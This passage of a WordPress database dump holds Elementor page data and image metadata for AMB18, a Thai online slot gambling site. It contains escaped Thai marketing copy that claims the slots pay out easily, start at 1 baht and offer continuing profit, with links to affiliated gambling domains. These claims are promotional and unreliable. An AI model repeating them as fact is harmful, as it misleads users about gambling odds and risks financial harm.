\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2a\\u0e38\\u0e19\\u0e31\\u0e02\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e04\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1a\\u0e19\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e14\\u0e43\\u0e2a \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e23\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e2a\\u0e39\\u0e07 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e44\\u0e14\\u0e49\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e15\\u0e2d\\u0e1a\\u0e2a\\u0e19\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-1-1.webp\",\"id\":352,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e19 \\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e27\\u0e2d \\u0e40\\u0e25\\u0e17 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e1f\\u0e23\\u0e35 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e40\\u0e14\\u0e42\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e15\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e19\\u0e43\\u0e08\\u0e25\\u0e07\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\\u0e40\\u0e01\\u0e21\\u0e41\\u0e25\\u0e30\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e41\\u0e25\\u0e30\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e23\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e19\\u0e23\\u0e38\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2b\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e21\\u0e32\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e08\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e04\\u0e48\\u0e41\\u0e2d\\u0e14 <\\/span><a href=\\\"http:\\/\\/luca333line.com\\\"><b>\\u0e44\\u0e25\\u0e19\\u0e4c<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e2a\\u0e2d\\u0e1a\\u0e16\\u0e32\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e15\\u0e34\\u0e21\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3225,414,'_wp_old_date','2026-02-26'),(3230,422,'_wp_attached_file','2026/05/Web-slot-bet-1-baht-AMB18.webp'),(3231,422,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:800;s:4:\"file\";s:38:\"2026/05/Web-slot-bet-1-baht-AMB18.webp\";s:8:\"filesize\";i:191312;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"Web-slot-bet-1-baht-AMB18-300x150.webp\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:18114;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"Web-slot-bet-1-baht-AMB18-1024x512.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:97628;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"Web-slot-bet-1-baht-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10536;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"Web-slot-bet-1-baht-AMB18-768x384.webp\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:68576;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"Web-slot-bet-1-baht-AMB18-1536x768.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:163402;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3232,422,'_elementor_source_image_hash','a65021543d49f0ee2dbc2aab29413e0d59ee40ea'),(3233,423,'_elementor_edit_mode','builder'),(3234,423,'_elementor_template_type','section'),(3235,423,'_elementor_version','3.35.5'),(3236,423,'_elementor_pro_version','3.32.3'),(3237,424,'_elementor_edit_mode','builder'),(3238,424,'_elementor_template_type','section'),(3239,424,'_elementor_version','3.35.5'),(3240,424,'_elementor_pro_version','3.32.3'),(3241,423,'_thumbnail_id','422'),(3242,423,'_wp_page_template','default'),(3243,423,'_elementor_page_settings','a:4:{s:10:\"hide_title\";s:3:\"yes\";s:16:\"background_image\";a:3:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:4:\"size\";s:0:\"\";}s:25:\"background_video_fallback\";a:3:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:4:\"size\";s:0:\"\";}s:28:\"background_slideshow_gallery\";a:0:{}}'),(3244,423,'_elementor_data','[{\"id\":\"6cb3dbc0\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#FFFFFF\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_slideshow_gallery\":[],\"background_hover_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_hover_slideshow_gallery\":[],\"background_overlay_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_slideshow_gallery\":[],\"background_overlay_hover_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_hover_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_hover_slideshow_gallery\":[]},\"elements\":[{\"id\":\"c031bec\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_slideshow_gallery\":[],\"background_hover_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_hover_slideshow_gallery\":[],\"background_overlay_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_slideshow_gallery\":[],\"background_overlay_hover_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_hover_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_hover_slideshow_gallery\":[]},\"elements\":[{\"id\":\"3ae32109\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\" style=\\\"text-align: center;\\\"><span style=\\\"color: #ff6600;\\\"><a style=\\\"color: #ff6600;\\\" href=\\\"http:\\/\\/luca333.net\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><strong>Luca333<\\/strong><\\/a><\\/span><\\/p>\",\"_background_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"_background_hover_slideshow_gallery\":[],\"_mask_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3245,425,'_elementor_edit_mode','builder'),(3246,425,'_elementor_template_type','section'),(3247,425,'_elementor_version','3.35.5'),(3248,425,'_elementor_pro_version','3.32.3'),(3249,425,'_thumbnail_id','422'),(3250,425,'_wp_page_template','default'),(3251,425,'_elementor_page_settings','a:4:{s:10:\"hide_title\";s:3:\"yes\";s:16:\"background_image\";a:3:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:4:\"size\";s:0:\"\";}s:25:\"background_video_fallback\";a:3:{s:3:\"url\";s:0:\"\";s:2:\"id\";s:0:\"\";s:4:\"size\";s:0:\"\";}s:28:\"background_slideshow_gallery\";a:0:{}}'),(3252,425,'_elementor_data','[{\"id\":\"6cb3dbc0\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#FFFFFF\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_slideshow_gallery\":[],\"background_hover_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_hover_slideshow_gallery\":[],\"background_overlay_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_slideshow_gallery\":[],\"background_overlay_hover_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_hover_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_hover_slideshow_gallery\":[]},\"elements\":[{\"id\":\"c031bec\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_slideshow_gallery\":[],\"background_hover_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_hover_slideshow_gallery\":[],\"background_overlay_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_slideshow_gallery\":[],\"background_overlay_hover_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_hover_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"background_overlay_hover_slideshow_gallery\":[]},\"elements\":[{\"id\":\"3ae32109\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\" style=\\\"text-align: center;\\\"><span style=\\\"color: #ff6600;\\\"><a style=\\\"color: #ff6600;\\\" href=\\\"http:\\/\\/luca333.net\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><strong>Luca333<\\/strong><\\/a><\\/span><\\/p>\",\"_background_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"},\"_background_hover_slideshow_gallery\":[],\"_mask_image\":{\"url\":\"\",\"id\":\"\",\"size\":\"\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3254,423,'_elementor_controls_usage','a:3:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:1;s:16:\"content_position\";i:1;s:5:\"align\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:14:\"section_layout\";a:2:{s:6:\"layout\";i:1;s:16:\"content_position\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:3:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;s:18:\"background_color_b\";i:1;}}}}}'),(3268,427,'_thumbnail_id','371'),(3269,427,'_elementor_edit_mode','builder'),(3270,427,'_elementor_template_type','wp-page'),(3271,427,'_elementor_version','3.35.5'),(3272,427,'_elementor_pro_version','3.32.3'),(3273,427,'_wp_page_template','default'),(3274,427,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(3275,427,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 